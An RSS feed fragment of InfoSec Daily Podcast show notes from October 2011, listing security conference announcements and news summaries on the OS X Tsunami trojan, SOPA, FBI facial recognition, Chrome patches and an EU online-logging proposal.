	( It is just a gathering of security professionals and their families. &#160;No talks, just abunch of likeminded people and some good food.)
	BsidesATL 2011
	When: November 4th, 2011
	Where: Think Inc World HQ, 1375 Peachtree St. Suite 600, Atlanta, Ga (The Earthlink Bldg).
	http://www.securitybsides.com/w/page/44893559/BSidesATL-2011
	This year there will be 3 tracks, a CISO panel on some good topics recently (Hacker vs Biz Skillset, etc), Lockpick Village by FALE, Prize Giveaway at End. &#160;Of course all day Podcast Area.
	SkyDogCon
	When: Nov 4th &#8211; Nov 6th
	Where: Holiday Inn Airport, Nashville, TN
	http://www.skydogcon.com
	Phreaknic
	When: Nov 4th &#8211; Nov 6th
	Where: Days Inn Stadium, Nashville, TN
	http://www.phreaknic.info

	BSidesDFW 2011
	When: November 5th, 2011
	Where: Microsoft Technology Center Dallas
	http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011
	Cost = FREE
	2011 Fall Information Security Conference
	When: &#160;November 8 &#8211; 9, 2011
	Where: Atlanta, GA (Loudermilk Conference Center)
	http://www.gaissa.org
	BSides Delaware
	When: November 11-12, 2011
	Where: Wilmington University, Delaware Campus
	http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: http://www.tgdaily.com/security-features/59283-tsunami-a-os-x-trojan-spotted-in-the-wild
	Security researchers have identified a new backdoor trojan targeting systems running Mac OS X. &#160;Interestingly enough, Tsunami appears to be a port of Troj/Kaiten, a Linux Trojan that embeds itself on a computer system and monitors an IRC channel for further instructions.
	As Sophos Security researcher Graham Cluley notes, trojans like Tsunami/Kaiten are typically used to drag infected computers into coordinated DDoS (distributed denial-of-service) attacks, which flood a targeted website server with a massive amount of traffic.
	&#34;It&#39;s not just a DDoS tool though. As you can see by the portion of OSX/Tsunami&#39;s source code, the bash script can be given a variety of different instructions and can be used to remotely access an affected computer,&#34; he explained.
	&#34;The big question, of course, is how would this code find itself on your Mac in the first place? It could be that a malicious hacker plants it there, to access your computer remotely and launch DDoS attacks, or it may even be that you have volunteered your Mac to participate in an organized attack on a website.&#34;
	Cluley also warned that he &#34;fully expected&#34; to see cyber criminals target poorly protected Mac computers in the future.   
	&#34;If the bad guys think they can make money out of infecting and compromising Macs, they will keep trying,&#34; he added. 
	Source: &#160;https://www.eff.org/deeplinks/2011/10/disastrous-ip-legislation-back-%E2%80%93-and-it%E2%80%99s-worse-ever
	We&#39;ve reported here often on efforts to ram through Congress legislation that would authorize massive interference with the Internet, all in the name of a fruitless quest to stamp out all infringement online. &#160;Today Representative Lamar Smith upped the ante, introducing legislation, called the Stop Online Piracy Act, or &#34;SOPA,&#34; that would not only sabotage the domain name system but would also threaten to effectively eliminate the DMCA safe harbors that, while imperfect, have spurr[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 504 &#8211; End of Anonymity, 18 Chrome Bugs, Black Box OS, Wireless Disconnect &amp; Arctic Chill</title>
		<link>http://www.isdpodcast.com/episode-504-end-of-anonymity-18-chrome-bugs-black-box-os-wireless-disconnect-arctic-chill</link>
		<comments>http://www.isdpodcast.com/episode-504-end-of-anonymity-18-chrome-bugs-black-box-os-wireless-disconnect-arctic-chill#comments</comments>
		<pubDate>Thu, 27 Oct 2011 01:35:42 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3023</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 504 for October 26, 2011. &#160;Tonight&#39;s podcast is hosted by Boris Sverdlik, Geordy Rostad, and Varun Sharma. Announcements: New Hampshire InfoSec Tweetup When: October 29, 2011 Where: Pawtuckaway State Park in Nottingham, NH http://nhinfosectweetup.eventbrite.com/ ( It is just a gathering of security professionals and their families. &#160;No talks, just abunch of [...]]]></description>
			<content:encoded><![CDATA[<p>
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 504 for October 26, 2011. &nbsp;Tonight&#39;s podcast is hosted by Boris Sverdlik, Geordy Rostad, and Varun Sharma.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New Hampshire InfoSec Tweetup</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 29, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Pawtuckaway State Park in Nottingham, NH</span><br />
	<a href="http://nhinfosectweetup.eventbrite.com/%20"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nhinfosectweetup.eventbrite.com/ </span></a><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">( It is just a gathering of security professionals and their families. &nbsp;No talks, just abunch of likeminded people and some good food.)</span></p>
<p>	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BsidesATL 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 4th, 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span></a><a href="http://www.microsoft.com/en-us/mtc/locations/dallas.aspx"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Think Inc World HQ, 1375 Peachtree St. Suite 600, Atlanta, Ga (The Earthlink Bldg).</span></a><br />
	<a href="http://www.securitybsides.com/w/page/44893559/BSidesATL-2011"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/44893559/BSidesATL-2011</span></a><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This year there will be 3 tracks, a CISO panel on some good topics recently (Hacker vs Biz Skillset, etc), Lockpick Village by FALE, Prize Giveaway at End. &nbsp;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SkyDogCon</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Holiday Inn Airport, Nashville, TN</span><br />
	<a href="http://www.skydogcon.com/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Phreaknic</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Days Inn Stadium, Nashville, TN</span><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.phreaknic.info</span></a></p>
<p>	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSidesDFW 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 5th, 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span></a><a href="http://www.microsoft.com/en-us/mtc/locations/dallas.aspx"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Microsoft Technology Center Dallas</span></a><br />
	<a href="http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011<br class="kix-line-break" /><br />
	</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cost = FREE</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2011 Fall Information Security Conference</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 8 &#8211; 9, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA (Loudermilk Conference Center)<br class="kix-line-break" /><br />
	</span><a href="http://www.gaissa.org/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.gaissa.org</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Delaware</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 11-12, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Wilmington University, Delaware Campus</span><br />
	<a href="http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="https://www.eff.org/deeplinks/2011/10/fbi-ramps-its-next-generation-identification-roll-out-winter-will-your-image-end"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.eff.org/deeplinks/2011/10/fbi-ramps-its-next-generation-identification-roll-out-winter-will-your-image-end</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">NextGov.com is reporting that the FBI will begin rolling out its Next Generation Identification (NGI) facial recognition service as early as this January. &nbsp;Once NGI is fully deployed and once each of its approximately 100 million records also includes photographs, it will become trivially easy to find and track Americans.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As we detailed in an earlier post, NGI expands the FBI&rsquo;s IAFIS criminal and civil fingerprint database</span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">to include multimodal biometric identifiers such as iris scans, palm prints, photos, and voice data. The Bureau is planning to introduce each of these capabilities in phases (pdf, p.4) over the next two and a half years, starting with facial recognition in four states&mdash;Michigan, Washington, Florida, and North Carolina&mdash;this winter.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Despite the FBI&rsquo;s claims to the contrary, NGI will result in a massive expansion of government data collection for both criminal and noncriminal purposes. IAFIS is already the largest biometric database in the world&mdash;it includes 70 million subjects in the criminal master file and more than 31 million civil fingerprints. Even if there are duplicate entries or some overlap between civil and criminal records, the combined number of records covers close to 1/3 the population of the United States. When NGI allows photographs and other biometric identifiers to be linked to each of those records, all easily searchable through sophisticated search tools, it will have an unprecedented impact on Americans&#39; privacy interests.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Although IAFIS currently includes some photos, they have so far been limited specifically to mug shots linked to individual criminal records. However, according to a 2008 Privacy Impact Assessment for NGI&rsquo;s Interstate Photo System, NGI will allow unlimited submission of photos and types of photos. Photos won&rsquo;t be limited to frontal mug shots but may be taken from other angles and may include close-ups of scars, marks and tattoos. NGI will allow all levels of law enforcement, correctional facilities, and criminal justice agencies at the local, state, federal and even international level to submit and access photos, and will allow them to submit photos in bulk. Once the photos are in the database, they can be found easily using facial recognition and text-based searches for distinguishing characteristics.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The new NGI database will also allow law enforcement to submit public and private security camera photos that may or may not be linked to a specific person&rsquo;s record. This means that anyone could end up in the database&mdash;even if they&rsquo;re not involved in a crime&mdash; by just happening to be in the wrong place at the wrong time or by, for example, engaging in political protest activities in areas like Lower Manhattan that are rife with security cameras.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The biggest change in NGI will be the addition of non-criminal photos. If you apply for any type of job that requires fingerprinting or a background check, your potential employer could require you to submit a photo to the FBI. And, as the 2008 PIA notes, &ldquo;expanding the photo capability within the NGI [Interstate Photo System] will also expand the searchable photos that are currently maintained in the repository.&rdquo; Although noncriminal information is ostensibly kept separate from criminal, all the data will be in the NGI system, and presumably it would not be difficult to search all the data at once. The FBI does not say whether there is any way to ever have your photo removed from the database.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to an FBI presentation on facial recognition and identification initiatives (pdf, p.5) at a biometrics conference last year, one of the FBI&rsquo;s goals for NGI is to be able to track people as they move from one location to another. Recent advancements in camera and surveillance technology over the last few years will support this goal. For example, in a National Institute of Justice presentation (pdf, p.17) at the same 2010 biometrics conference, the agency discussed a new 3D binocular and camera that allows realtime facial acquisition and recognition at 1000 meters. The tool wirelessly transmits images to a server, which searches them against a photo database and identifies the photo&#39;s subject. As of 2010, these binoculars were already in field-testing with the Los Angeles Sheriff&rsquo;s Department. Presumably, the backend technology for these binoculars could be incorporated into other tools like body-mounted video cameras or the MORIS (Mobile Offender Recognition and Information System) iPhone add-on that some police officers are already using.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="https://www.scmagazineus.com/google-closes-18-chrome-holes/article/215297"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.scmagazineus.com/google-closes-18-chrome-holes/article/215297</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google on Tuesday pushed out a new version of its Chrome web browser to rectify 18 vulnerablities, including 11 that are deemed &quot;high&quot; in severity. Version 15, part of the &quot;stable&quot; channel of Chrome, also includes protection against Browser Exploit Against SSL/TLS (BEAST), a JavaScript hacking tool disclosed last month at a security conference in Argentina that can decrypt HTTPS requests and encrypted cookies. Microsoft has since issued an advisory that acknowledges the issue, along with a Fix-It solution. Meanwhile, researchers who disclosed the flaws in Chrome received more than $26,000 combined for their finds as part of Google&#39;s bug bounty program.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.techdirt.com/articles/20111021/11554216450/eu-politician-wants-internet-surveillance-built-into-every-operating-system.shtml"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.techdirt.com/articles/20111021/11554216450/eu-politician-wants-internet-surveillance-built-into-every-operating-system.shtml</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Think of the children&quot; has become the rallying cry of politicians around the world trying to push for ever-increasing Internet surveillance powers. Since nobody wants to run the risk of being branded as soft on crimes like paedophilia, resistance to such measures is greatly reduced as a result.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This approach was used in the &quot;Declaration of the European Parliament of 23 June 2010 on setting up a European early warning system (EWS) for paedophiles and sex offenders&quot; which:</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">2. Asks the Council and the Commission to implement Directive 2006/24/EC of the European Parliament and of the Council of 15 March 2006 on the retention of data generated or processed in connection with the provision of publicly available electronic communications services or of public communications networks and extend it to search engines in order to tackle online child pornography and sex offending rapidly and effectively;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">3. Calls on the Member States to coordinate a European early warning system involving their public authorities, based on the existing system for food safety, as a means of tackling paedophilia and sex offending;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The two European politicians behind the Declaration, which seeks to extend the already intrusive Data Retention Directive, were Tiziano Motti and Anna Zaborska. Motti now wants to go even further by monitoring and storing all Internet activity in the European Union. The press release about the launch of this new initiative was entitled &quot;Data Retention Directive: the fight against paedophiles and sexual predators on the net, respecting citizens&#39; right to privacy&quot;; it explained:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">The press conference will focus on the most discussed part of the Data Retention Directive, which is under revision, and on the &#39;Motti Resolution&#39; approved by Parliament in 2010, asking to extend this Directive to content providers (social networks etc) in order to identify more easily those who commit crimes, including paedophilia through sexual harassment on the Net (recognised as a crime by the legislative Resolution to be voted at the next plenary session in Strasbourg). This is a request which does not regard specifically the online content, which falls under the Regulation of wiretapping, but to the traffic data developed by the person uploading material of any kind on the net: comments, pictures, videos.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">During this press conference, Mr Motti will present the solutions that can make possible the enforcing of the Resolution approved in June 2010, through a study provided by computer expert Fabio Ghioni, and he will answer to the objections, especially from northern Europe, to the Resolution asking for the broadening of the Directive.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As this indicates, in order to forestall the usual accusations of technical cluelessness, Motti was joined by Fabio Ghioni, described by the press release as &quot;World Expert on security and non-conventional technologies, author of the book &#39;Hacker Republic&#39;&quot;. Ghioni&#39;s site carries more details about the ambitious plans, reproducing an article (in Italian) that comes from the web site of Famiglia Cristiana (Christian Family).</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Strangely, there Ghioni&#39;s project is presented not as a way to catch paedophiles, but as being about keeping personal data safe. The article talks about the fact that users willingly hand over all kinds of information to Facebook but have no control over what the company&#39;s employees might do with it. Because of this, Famiglia Cristiana says:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">it is worthwhile to evaluate the system developed by Ghioni, which is called LogBox and provides data storage for two years with features that aim to ensure fundamental rights and freedoms of citizens.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&#39;s not exactly clear from the article how a black box that logs all your online activities and stores the data for two years will ensure those fundamental rights and freedoms, but the general drift seems to be that you will have a record of everything that you did, which you could use in court, for example, if you are wrongly accused of some misuse of the computer. What this overlooks, of course, is that it will also be a tempting target for governments who want to keep a tight rein on their citizens, or for companies that want to enforce copyright laws by monitoring alleged file sharing activities.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">The LogBox system devised by Ghioni encrypts data, placing the decryption key in the hands of the authorities, a notary [lawyer] and the user of the system. Thus the digital certificate is guaranteed by the three entities, including the user, who is in control.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">That sounds as if a digital hash of the connection data is encrypted with one or three separate keys &#8211; it&#39;s not entirely clear. In theory, having three different keys, all of which were required to decrypt, could be quite secure, but it&#39;s no proof against court orders demanding your decryption key. On the other hand, having only one shared key would be an invitation for the police to snoop through your online logs all the time. And yet the article insists:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Let&#39;s be clear that this has nothing to do with interceptions: here we are talking about digital data, not contents. Currently the two main issues that result in a &quot;wild west Internet&quot; are digital identity and authentication of both the users and the service providers. Let&#39;s take the example of social networks: currently anyone can create a fake personal profile. Let&#39;s take the example of online paedophiles: they can be traced only if they use their own account but if, as is easy to do, they connect from a different IP address in some other country, they will never be held responsible for the criminal actions they carry out.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">From this it seems that one of the key features of the black box is to make pseudonymous or anonymous activity online impossible. Again, it&#39;s hard to see any benefits whatsoever for users &ndash; in what way is this &quot;respecting citizens&#39; right to privacy&quot;? &#8211; but plenty for governments and the copyright industry.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Even more surprising is exactly how Ghioni wants the black box idea implemented:</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">The LogBox system would clarify these issues through a precise mechanism that involves the &quot;collaboration&quot; of the operating systems. Therefore the help of Windows, Apple, Linux will be needed. The operating systems will have to store the characteristics of all the activity logs (in practice, tables) generated by the computer that is running the operating system. That&#39;s no small thing, because the logs would be signed digitally in such a way as to relate to a specific computer and its user. And this will be independent of any attempt to anonymize illegal activities. Ghioni insists that the costs of this operation will be extremely low.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cost is hardly the issue. Even if the EU were to insist that Microsoft and Apple implement this black box &quot;feature&quot; in their products, this is simply unworkable for GNU/Linux-based systems. By its very nature, open source lets you hack the code, and so removing any such digital black boxes &ndash; even assuming they were put there in the first place by the likes of Red Hat and Canonical &ndash; would be relatively easy. Hacked versions would circulate online almost immediately.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The only way to stop that happening would be to forbid people from installing &quot;unauthorised&quot; versions or from making &quot;unauthorised&quot; changes to the system code once installed &ndash; which would effectively make open source operating systems illegal in Europe. Given that the Linux kernel was created in Finland, that would be ironic to say the least.</span></p>
